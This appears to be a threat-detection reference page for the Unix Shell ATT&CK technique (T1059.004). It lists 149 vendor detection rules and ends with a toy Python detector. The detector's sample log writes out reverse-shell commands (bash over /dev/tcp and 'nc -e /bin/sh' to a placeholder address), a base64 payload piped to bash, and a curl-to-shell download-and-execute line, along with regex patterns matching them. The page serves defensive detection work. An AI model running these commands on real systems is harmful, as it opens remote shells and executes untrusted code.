T1059.004

Unix Shell

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution (DieNet Bash; Apple ZShell). Unix shells can control every aspect of a system, with certain commands requiring elevated privileges. Unix shells also support scripts that enable sequential execution of commands...

Platforms: ESXi, Linux, macOS, Network Devices

149 detections, 4 sources, 10 threat actors

By source: 128 elastic, 14 sigma, 6 splunk_escu, 1 crowdstrike_cql

PROCEDURES (82)

Auto-extracted detection clusters, as cluster label (number of detections):

General Monitoring (12), Persist (9), Process Creation Monitoring (7), Suspicious (4), Token (4), Http (3), Child Process (3), Container (3), Aws (3), Download (3), Exfiltrat (3), Network Connection Monitoring (3), Bypass (2), Obfuscat (2), Command And Control (2), Inject (2), Remote (2), Inject (2), Parent Process (2), Privilege (2), Suspicious (2), Remote (2), Kernel (2), Credential (2), Startup (2), Inject (2), Exfiltrat (2), Script Execution Monitoring (2), Persist (2), Container (2), Parent Process (2), Parent Process (2), Kubernetes (2), Obfuscat (2), Child Process (1), Cloud Monitoring (1), Exfiltrat (1), Privilege (1), Service (1), Unusual (1), Unusual (1), Suspicious (1), Child Process (1), Service (1), Unusual (1), Privilege (1), Command And Control (1), Suspicious (1), Registry Monitoring (1), Persist (1), Command And Control (1), Download (1), Service (1), Remote (1), Obfuscat (1), Obfuscat (1), Api (1), Lateral (1), Bypass (1), Inject (1), Lateral (1), Kernel Monitoring (1), Privilege (1), Credential (1), Download (1), C2 (1), Service (1), Base64 (1), C2 (1), Startup (1), Kernel (1), Kernel (1), Persist (1), Base64 (1), Token (1), Kubernetes (1), Container (1), Suspicious (1), Aws (1), C2 (1), Persist (1), Bypass (1)

DETECTIONS (149)

Name [source, severity]

Attempt to Install Kali Linux via WSL [elastic, high]
AWS EC2 LOLBin Execution via SSM SendCommand [elastic, medium]
AWS EC2 Startup Shell Script Change [sigma, high]
AWS SSM `SendCommand` with Run Shell Command Parameters [elastic, medium]
Base64 Decoded Payload Piped to Interpreter [elastic, high]
Boot File Copy [elastic, low]
BPF filter applied using TC [elastic, high]
BPFtrace Unsafe Option Usage [sigma, medium]
Cupsd or Foomatic-rip Shell Execution [elastic, high]
Curl Execution via Shell Profile [elastic, high]
Curl or Wget Egress Network Connection via LoLBin [elastic, medium]
Decoded Payload Piped to Interpreter Detected via Defend for Containers [elastic, high]
Direct Interactive Kubernetes API Request by Common Utilities [elastic, medium]
Direct Interactive Kubernetes API Request by Unusual Utilities [elastic, low]
Direct Interactive Kubernetes API Request Detected via Defend for Containers [elastic, low]
Dracut Module Creation [elastic, low]
Dynamic Linker (ld.so) Creation [elastic, medium]
Egress Connection from Entrypoint in Container [elastic, medium]
Encoded Payload Detected via Defend for Containers [elastic, medium]
Equation Group Indicators [sigma, high]
Execution via GitHub Actions Runner [elastic, medium]
Execution via OpenClaw Agent [elastic, medium]
Execution via Windows Subsystem for Linux [elastic, medium]
Execution with Explicit Credentials via Scripting [elastic, medium]
File Creation and Execution Detected via Defend for Containers [elastic, medium]
File Creation by Cups or Foomatic-rip Child [elastic, medium]
File Creation in /var/log via Suspicious Process [elastic, medium]
File Creation, Execution and Self-Deletion in Suspicious Directory [elastic, high]
File Download Detected via Defend for Containers [elastic, medium]
File Transfer or Listener Established via Netcat [elastic, medium]
File Transfer Utility Launched from Unusual Parent [elastic, medium]
First Time Python Spawned a Shell on Host [elastic, medium]
Forbidden Direct Interactive Kubernetes API Request [elastic, medium]
Git Hook Child Process [elastic, low]
Git Hook Command Execution [elastic, low]
Git Hook Created or Modified [elastic, low]
Git Hook Egress Network Connection [elastic, medium]
GitHub Authentication Token Access via Node.js [elastic, medium]
Host File System Changes via Windows Subsystem for Linux [elastic, medium]
Ingress Tool Transfer Followed by Execution and Deletion Detected via Defend for Containers [elastic, high]
Initramfs Unpacking via unmkinitramfs [elastic, low]
InstallFix on macOS [crowdstrike_cql]
Interactive Bash Suspicious Children [sigma, medium]
Interactive Exec Into Container Detected via Defend for Containers [elastic, low]
Interactive Shell Launched via Unusual Parent Process in a Container [elastic, medium]
Interactive Shell Spawn Detected via Defend for Containers [elastic, low]
Interactive Terminal Spawned via Perl [elastic, high]
Interactive Terminal Spawned via Python [elastic, high]
JexBoss Command Sequence [sigma, high]
Kill Command Execution [elastic, low]
Kubernetes Direct API Request via Curl or Wget [elastic, medium]
Linux Decode Base64 to Shell [splunk_escu]
Linux Magic SysRq Key Abuse [splunk_escu]
Linux Restricted Shell Breakout via Linux Binary(s) [elastic, medium]
Linux Reverse Shell Indicator [sigma, critical]
Linux Suspicious React or Next.js Child Process [splunk_escu]
Linux Unix Shell Enable All SysRq Functions [splunk_escu]
MacOS LOLbin [splunk_escu]
Manual Dracut Execution [elastic, low]
Memory Swap Modification [elastic, medium]
Multi-Base64 Decoding Attempt from Suspicious Location [elastic, medium]
Netcat File Transfer or Listener Detected via Defend for Containers [elastic, medium]
Netcat Listener Established via rlwrap [elastic, medium]
Network Connection by Cups or Foomatic-rip Child [elastic, high]
Network Connection from Binary with RWX Memory Region [elastic, medium]
Network Connection via Recently Compiled Executable [elastic, medium]
Network Connections Initiated Through XDG Autostart Entry [elastic, medium]
NetworkManager Dispatcher Script Creation [elastic, low]
Node.js Pre or Post-Install Script Execution [elastic, medium]
Nohup Execution [sigma, medium]
Openssl Client or Server Activity [elastic, medium]
Payload Execution via Shell Pipe Detected by Defend for Containers [elastic, medium]
Pod or Container Creation with Suspicious Command-Line [elastic, medium]
Potential Abuse of Linux Magic System Request Key [sigma, medium]
Potential Code Execution via Postgresql [elastic, medium]
Potential Direct Kubelet Access via Process Arguments Detected via Defend for Containers [elastic, medium]
Potential Etherhiding C2 via Blockchain Connection [elastic, high]
Potential Execution via SSH Backdoor [elastic, medium]
Potential Git CVE-2025-48384 Exploitation [elastic, high]
Potential Hex Payload Execution via Command-Line [elastic, low]
Potential Hex Payload Execution via Common Utility [elastic, low]
Potential JAVA/JNDI Exploitation Attempt [elastic, high]
Potential Kubeletctl Execution Detected via Defend for Containers [elastic, low]
Potential Malware-Driven SSH Brute Force Attempt [elastic, medium]
Potential Meterpreter Reverse Shell [elastic, high]
Potential Reverse Shell [elastic, high]
Potential Reverse Shell via Background Process [elastic, high]
Potential Reverse Shell via Child [elastic, high]
Potential Reverse Shell via Java [elastic, medium]
Potential Reverse Shell via Suspicious Binary [elastic, high]
Potential Reverse Shell via Suspicious Child Process [elastic, high]
Potential Reverse Shell via UDP [elastic, medium]
Potential SAP NetWeaver Exploitation [elastic, high]
Potential Shell via Wildcard Injection Detected [elastic, medium]
Potential Upgrade of Non-interactive Shell [elastic, medium]
Printer User (lp) Shell Execution [elastic, high]
Privileged Container Creation with Host Directory Mount [elastic, high]
Privileged Docker Container Creation [elastic, medium]
Process Backgrounded by Unusual Parent [elastic, low]
Process Spawned from Message-of-the-Day (MOTD) [elastic, high]
Process Started with Executable Stack [elastic, low]
Proxy Shell Execution via Busybox [elastic, low]
Python Path File (pth) Creation [elastic, low]
Python Site or User Customize File Creation [elastic, low]
Root Network Connection via GDB CAP_SYS_PTRACE [elastic, medium]
Script Interpreter Spawning Credential Scanner - Linux [sigma, high]
Service Account Token or Certificate Access Followed by Kubernetes API Request [elastic, medium]
Shell Execution via Apple Scripting [elastic, medium]
Simple HTTP Web Server Connection [elastic, low]
Simple HTTP Web Server Creation [elastic, low]
Suspicious Activity in Shell Commands [sigma, high]
Suspicious APT Package Manager Execution [elastic, low]
Suspicious APT Package Manager Network Connection [elastic, medium]
Suspicious Browser Child Process [elastic, high]
Suspicious Commands Linux [sigma, medium]
Suspicious Content Extracted or Decompressed via Funzip [elastic, medium]
Suspicious Download and Execute Pattern via Curl/Wget [sigma, high]
Suspicious Echo or Printf Execution Detected via Defend for Containers [elastic, high]
Suspicious Emond Child Process [elastic, medium]
Suspicious Execution via Windows Subsystem for Linux [elastic, low]
Suspicious File Creation via Pkg Install Script [elastic, high]
Suspicious Filename with Embedded Base64 Commands [sigma, high]
Suspicious Installer Package Spawns Network Event [elastic, medium]
Suspicious Interpreter Execution Detected via Defend for Containers [elastic, medium]
Suspicious Linux Discovery Commands [splunk_escu]
Suspicious macOS MS Office Child Process [elastic, medium]
Suspicious Mining Process Creation Event [elastic, medium]
Suspicious Named Pipe Creation [elastic, high]
Suspicious Path Invocation from Command Line [elastic, low]
Suspicious Process Execution Detected via Defend for Containers [elastic, high]
Suspicious React Server Child Process [elastic, high]
Suspicious Reverse Shell Command Line [sigma, high]
Suspicious System Commands Executed by Previously Unknown Executable [elastic, low]
System Path File Creation and Execution Detected via Defend for Containers [elastic, medium]
Systemd Shell Execution During Boot [elastic, low]
Uncommon Destination Port Connection by Web Server [elastic, low]
Unknown Execution of Binary with RWX Memory Region [elastic, medium]
Unusual Base64 Encoding/Decoding Activity [elastic, low]
Unusual Command Execution from Web Server Parent [elastic, low]
Unusual D-Bus Daemon Child Process [elastic, low]
Unusual Execution from Kernel Thread (kthreadd) Parent [elastic, medium]
Unusual Interactive Shell Launched from System User [elastic, medium]
Unusual LD_PRELOAD/LD_LIBRARY_PATH Command Line Arguments [elastic, high]
Unusual Pkexec Execution [elastic, high]
Unusual Process Spawned from Web Server Parent [elastic, low]
Unusual Web Server Command Execution [elastic, medium]
Web Server Exploitation Detected via Defend for Containers [elastic, high]
Web Server Potential Command Injection Request [elastic, low]
Windows Subsystem for Linux Distribution Installed [elastic, medium]
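The technique description above says shells "can control every aspect of a system"; the detection list shows what that abuse looks like in process telemetry (reverse shells over /dev/tcp or netcat, base64-decoded payloads piped into an interpreter, curl/wget download-and-execute pipelines, interactive shells spawned by Python or Perl, shells spawned by a web server). The Python script below is an added illustration of those checks, written for this page; it is not any of the elastic, sigma, splunk_escu or crowdstrike_cql rules listed above, and its event schema, rule names, parent-process lists, hosts and addresses are assumptions. It runs the checks over constructed process-creation events in JSON Lines form.

```python
"""Toy T1059.004 detector: a handful of shell-abuse checks run over sample
process-creation events (JSON Lines). Added illustration only; the rule
names, event schema and sample events are this example's own, not any
vendor's rules or real telemetry."""
import json
import re
import shlex

SHELLS = {"sh", "bash", "zsh", "dash", "ash", "ksh"}
SCRIPT_INTERPRETERS = ("python", "perl")            # prefix match: python3.11, perl5, ...
NETCAT = {"nc", "ncat", "netcat"}
WEB_SERVERS = {"nginx", "apache2", "httpd", "php-fpm"}  # assumed parent names

# Shell redirection to /dev/tcp or /dev/udp: the classic bash reverse shell.
DEV_TCP_RE = re.compile(r"/dev/(?:tcp|udp)/")
# "base64 -d ... | <interpreter>": decoded payload piped straight into an interpreter.
DECODE_PIPE_RE = re.compile(
    r"base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:sh|bash|zsh|dash|python3?|perl)\b")
# "curl ... | sh": download and execute in one pipeline.
DOWNLOAD_EXEC_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash|zsh|dash)\b")

# Constructed sample events (hypothetical hosts; 10.0.0.5 and 198.51.100.7 are
# placeholders, not real infrastructure).
SAMPLE_LOG = """\
{"process": {"executable": "/bin/bash", "command_line": "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1", "parent": {"executable": "/usr/sbin/sshd"}}}
{"process": {"executable": "/bin/sh", "command_line": "sh -c 'echo aWQ= | base64 -d | bash'", "parent": {"executable": "/usr/sbin/cron"}}}
{"process": {"executable": "/bin/sh", "command_line": "sh -c 'curl -fsSL http://198.51.100.7/x.sh | sh'", "parent": {"executable": "/usr/sbin/nginx"}}}
{"process": {"executable": "/bin/bash", "command_line": "/bin/bash -i", "parent": {"executable": "/usr/bin/python3"}}}
{"process": {"executable": "/bin/bash", "command_line": "bash -c 'ls -la /var/log'", "parent": {"executable": "/usr/sbin/sshd"}}}
{"process": {"executable": "/usr/bin/nc", "command_line": "nc -e /bin/sh 10.0.0.5 4444", "parent": {"executable": "/bin/bash"}}}
"""


def _base(path):
    """Basename of an executable path ('/usr/bin/python3' -> 'python3')."""
    return path.rsplit("/", 1)[-1]


def _args(cmd):
    """Tokenise a command line; fall back to whitespace split on unbalanced quotes."""
    try:
        return shlex.split(cmd)
    except ValueError:
        return cmd.split()


def detect(event):
    """Return the names of every check that fires for one event, in fixed order."""
    p = event["process"]
    exe, parent = _base(p["executable"]), _base(p["parent"]["executable"])
    cmd, args = p["command_line"], _args(p["command_line"])
    checks = [
        ("reverse_shell_dev_tcp", exe in SHELLS and DEV_TCP_RE.search(cmd)),
        ("reverse_shell_via_netcat", exe in NETCAT and "-e" in args),
        ("base64_decode_piped_to_interpreter", DECODE_PIPE_RE.search(cmd)),
        ("download_and_execute_via_curl_wget", DOWNLOAD_EXEC_RE.search(cmd)),
        ("interactive_shell_via_script_interpreter",
         exe in SHELLS and "-i" in args and parent.startswith(SCRIPT_INTERPRETERS)),
        ("shell_spawned_by_web_server", exe in SHELLS and parent in WEB_SERVERS),
    ]
    return [name for name, fired in checks if fired]


def load_events(jsonl):
    """Parse JSON Lines into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def scan(jsonl):
    """Return [(command_line, [rule, ...]), ...] for every event that fires a check."""
    out = []
    for event in load_events(jsonl):
        hits = detect(event)
        if hits:
            out.append((event["process"]["command_line"], hits))
    return out


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_LOG):
        print(f"{', '.join(hits):60s} {cmd}")
```

Five of the six constructed events fire; the plain `bash -c 'ls -la /var/log'` from sshd does not. Two points a practitioner should keep in mind: the checks key on the process name, the parent name and the raw command line, which is also what the listed rules have to work with, so parent lineage (a shell under nginx or python3) is what separates the web-server and interactive-terminal cases from ordinary administration; and substring matching is defeated by trivial rewrites (`ba''se64`, `$(printf ...)`, hex-encoded payloads), which is why the list above carries separate "Obfuscat", "Hex Payload" and "Unusual Base64" detections rather than relying on one pattern.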